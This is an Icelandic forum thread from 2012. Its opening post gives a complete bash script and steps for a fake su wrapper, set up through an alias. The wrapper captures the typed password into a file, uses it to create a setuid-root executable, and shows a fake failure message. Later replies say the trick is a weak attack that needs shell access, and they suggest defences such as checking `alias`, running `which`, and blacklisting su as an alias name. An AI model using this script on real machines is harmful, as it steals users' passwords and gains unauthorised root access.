spjallid.is

Tölvu og tækniáhuga samfélagið.
https://spjall.vaktin.is/

Phishing The Bash Shell

https://spjall.vaktin.is/viewtopic.php?f=15&t=47017

Síða 1 af 1

Phishing The Bash Shell

Sent: Fös 06. Apr 2012 17:02
af marijuana
Öryggisgalli í Bash ?

Farið í skel (ÞETTA ER FYRIR SU EKKI SUDO, hægt að gera þetta með bæði en su var uppsett hjá þeim sem fann þetta !! ;) )

1. farið í skel, xterm, gnome-terminal hvað sem er.
2. verið viss um að vera í home möppunni
3. Búið til skrá sem heitir my.sh

keyrið þessa línu hér :

Kóði: Velja allt

alias su="./my.sh"

Alias dettur út ef þið lokið svo þessum terminal glugga, ekki vonast til að það sé þarna til eilífðar .. :P

4. Setjið þetta inní my.sh

#!/bin/bash

#create a couple of files - password to capture the password and exefile to become our effective root(uid) executable
touch password &> /dev/null
touch exefile &> /dev/null

echo -n "Password: "

#turn off keystroke echo
stty -echo

#read and store password in reads default variable REPLY
read

#turn echo back on
stty echo

#pass the value in REPLY to the file password and to the command su
printf "%s\n" "$REPLY" | tee password | su -c "chown root:root ./exefile; chmod 4755 ./exefile" &> /dev/null

#display the fake password failure message
sleep 1
echo
echo "su: incorrect password"

#move my.sh somewhere else
mv ./my.sh ./my.sh.bu

#create a symbolic link so that su points to the executable su
ln -s $(which su) ./my.sh

exit 0


chmod ið hana svo hún sé keyranleg ..

Kóði: Velja allt

chmod +x my.sh


svo gerið þið bara

su root

setjið inn passwordið, það kemur rangt í fyrstu tilraun, í annarri komist þið svo í root skel.

Eftir fyrstu tilraun þá er lykilorðið í skrá sem heitir password :)


Linux ain't so secure ya know ! :)

Re: Phishing The Bash Shell

Sent: Lau 07. Apr 2012 12:50
af coldcut
en þú þarft root/sudo til að geta gert þetta...so what's your point?

Re: Phishing The Bash Shell

Sent: Lau 07. Apr 2012 17:18
af dandri
Þetta telst varla sem öryggisgalli

Re: Phishing The Bash Shell

Sent: Lau 07. Apr 2012 18:50
af dori
Þetta er öryggisgalli, þetta er fítus. Þetta er bara bash scripta sem wrappar su og loggar lykilorðið. Þetta gæti auðvitað verið vesen ef einhver kemst í vélina þína. En það er líka hægt að setja þetta í ~/.profile til að það sé alltaf keyrt (en þá er það mjög augljóst). Það er hægt að sjá með því að skrifa `alias` hvort það sé búið að fokka eitthvað svona með bash skipunum. Svo er líka hægt að keyra `which SKIPUN` til að sjá hvaða skipun þú ert virkilega að fara að keyra.

Re: Phishing The Bash Shell

Sent: Lau 07. Apr 2012 20:58
af gardar
Svo er líka alltaf hægt að gera blacklista yfir orð sem ekki má nota sem alias :)

Re: Phishing The Bash Shell

Sent: Lau 07. Apr 2012 23:19
af marijuana
coldcut skrifaði:en þú þarft root/sudo til að geta gert þetta...so what's your point?


nei, þarft ekki root/superuser til að gera þetta, þetta er bara logger sem tekur passwordið í su, þarft ekki superuser til þessa !

Og með að blacklista orð sem má ekki nota sem alias gerir EKKERT gagn, getur alltaf breytt nafninu á scriptuni, ætlaru að banna öll orð í heiminum ?? :woozy

Re: Phishing The Bash Shell

Sent: Lau 07. Apr 2012 23:25
af gardar
marijuana skrifaði:Og með að blacklista orð sem má ekki nota sem alias gerir EKKERT gagn, getur alltaf breytt nafninu á scriptuni, ætlaru að banna öll orð í heiminum ?? :woozy



Blacklistar su, problem solved.

Re: Phishing The Bash Shell

Sent: Lau 07. Apr 2012 23:36
af dori
marijuana skrifaði:
coldcut skrifaði:en þú þarft root/sudo til að geta gert þetta...so what's your point?


nei, þarft ekki root/superuser til að gera þetta, þetta er bara logger sem tekur passwordið í su, þarft ekki superuser til þessa !

Og með að blacklista orð sem má ekki nota sem alias gerir EKKERT gagn, getur alltaf breytt nafninu á scriptuni, ætlaru að banna öll orð í heiminum ?? :woozy

En þú getur bara gert þetta á þínum aðgangi í þinni skel (s.s. þú loggar þig inn og skrifar þetta og þetta dettur út eftir að skelinni er lokað). Þetta er fínt hobbí en sem "árás" er þetta 2/10. Augljóslega gætirðu sett þetta inní .profile eða .bashrc hjá einhverjum sem þú vilt stela lykilorði af en til þess þyrftirðu réttindi til að breyta þeim skrám og ef þú hefur þau eru margar mun betri aðferðir til að komast í þessar upplýsingar (gætir t.d. bara skipt út /bin/su ef þú hefur sudo réttindi).

Alias blacklisti er ekki á það sem er keyrt heldur, eins og Garðar bendir á, skipanirnar sem þú getur maskað. Þ.a.l. er hægt að banna þetta.

Re: Phishing The Bash Shell

Sent: Sun 08. Apr 2012 02:15
af tdog
Useless ef að aðgangurinn sem þetta er gert á er ekki í sudoers skránni.

Re: Phishing The Bash Shell

Sent: Sun 08. Apr 2012 02:49
af dori
tdog skrifaði:Useless ef að aðgangurinn sem þetta er gert á er ekki í sudoers skránni.

Reyndar ekki beint. Ef notandinn væri á annað borð að nota su er hann að fara að skipta um notanda og þú færð lykilorðið fyrir þann notanda sem er verið að skipta yfir í. Í 99% tilfella er það root (eða eitthvað, allavega þegar ég geri það).
Reyndar virðist þetta gera ráð fyrir því að það sé bara verið að nota su til að skipta yfir í root, ég hef ekki prufað þetta og nennti ekki að lesa þetta vel yfir þannig að mér gæti skjátlast.

Hvernig sem það er þá er þetta ekki öryggisgalli því að þú þarft annaðhvort rótaraðgang á tölvu eða aðgang að skel notanda sem er að fara að breyta sér í rót með því að nota su. Svo er þetta gagnslaust ef þú blacklistar su sem aðgerð sem má búa til sem alias.
Tímasetningar eru stilltar á UTC
Síða 1 af 1
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/